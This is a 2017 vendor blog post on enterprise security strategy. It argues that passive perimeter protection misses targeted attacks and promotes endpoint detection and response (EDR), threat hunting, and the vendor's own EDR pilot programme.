Creating an enterprise security strategy: How much is enough?

Credit to Author: Oleg Glebov| Date: Thu, 21 Sep 2017 11:00:19 +0000

When talking about an IT security strategy, businesses are interested in one question: What measures are sufficient? For a long time, common wisdom held that a passive strategy — protecting the network perimeter and workstations — sufficed. But with enterprises increasingly falling victim to advanced and targeted attacks, it’s now clear that protection requires new methods, such as EDR (endpoint detection and response).

Why passive strategies aren’t enough

Passive strategies work well against mass threats: mailings containing Trojans, phishing schemes, well-known vulnerabilities, and so forth. In other words, such strategies are effective when attackers cast a wide net, hoping to reel in, and profit from, anyone they manage to trick. Their business is illegal, but it still generally conforms to business practice, seeking a good balance — in this case, balance between attack complexity (and thus cost) and expected profit.

protection requires new methods, such as EDR (endpoint detection and response)

But if your company becomes an interesting target (and if it’s an enterprise, it’s very likely to attract interest), it may become a specific target. Those targeting a company may be interested in completely different things, such as financial transactions, trade secrets, or your customers’ data. Or the goal may simply be to sabotage you to help your competitors. Some may just think it profitable to attack a company in your industry.

This is where criminals start investing in complex and targeted attacks. They research the software your company uses, looking for vulnerabilities that are yet unknown to the market and developing unique exploits. They may look for ways in through partners and suppliers, and bribe former employees. They may find disgruntled employees and try to organize an attack from the inside. In the latter scenario, criminals may do without malware entirely, relying exclusively on legitimate tools that a traditional security solution won’t consider threats.

Why a delay is so dangerous

There is a chance that passive systems will detect a targeted attack or some activity associated with one. However, even when they do, most frequently, the systems will merely detect the fact of the incident, which will not help you quickly determine what actually happened, what information was affected by the incident, how to stop it, and how to prevent it from happening again.
If your company uses only traditional endpoint security tools, security service employees will not always be able to respond to an attack in time. Their hands are tied while they wait for a cyberincident to occur, and only then can they start an investigation. Additionally, they may miss a priority incident among the hundreds of smaller incidents that are simply part of doing business.

Analysts usually obtain this data a lot later. Only after careful investigation, which typically involves painstaking manual work, will the incident be reported to response and recovery experts. Even in large companies with serious response centers, all three roles — security specialist, analyst, and response expert — are in many cases performed by the same person.
According to our statistics, an average of 214 days pass from initial system penetration to the moment a large company detects a complex threat. In the best-case scenario, IT security specialists manage to identify traces of an attack at the last stage of the kill chain. More often, they are left to calculate losses and recover systems after the fact.

How to minimize risks and optimize IT security

A new, adaptive approach is required to protect organizations’ intellectual property, reputations, and other key assets. Network perimeter and workstation protection strategies must be adjusted and reinforced by active search tools and a unified investigation and response to IT security threats.

True Cybersecurity strategy involves the use of an active search concept, known as threat hunting. It is a rather difficult task, but the use of specialized tools can make it significantly easier. EDR, or endpoint detection and response, is one such tool. It gives IT security staff the ability to quickly identify threats on workstations using a unified interface and then to automatically gather information and neutralize an attack. EDR systems use threat intelligence information, which many companies acquire from various sources to control processes within their corporate networks.

Theoretically, threat hunting may be performed without EDR; however, purely manual threat hunting is significantly more expensive and less effective. But there’s more: It can negatively affect business processes in as much as it requires analysts to directly interfere with the operation of a wide range of workstations.

In essence, EDR gives security operations center experts the ability to quickly collect all of the information they need, analyze it (both automatically and manually), make decisions, and then also remotely delete any file or malware through the unified control interface, place any object into quarantine, and launch any processes required for recovery — all without users ever noticing a thing, because it does not require physical access to the workstation or disrupt business operations.

We’ve been working on solutions for these issues for some time and have launched a pilot version of our own EDR solution. We invite you to join our EDR piloting program and learn more about our solution.

https://blog.kaspersky.com/feed/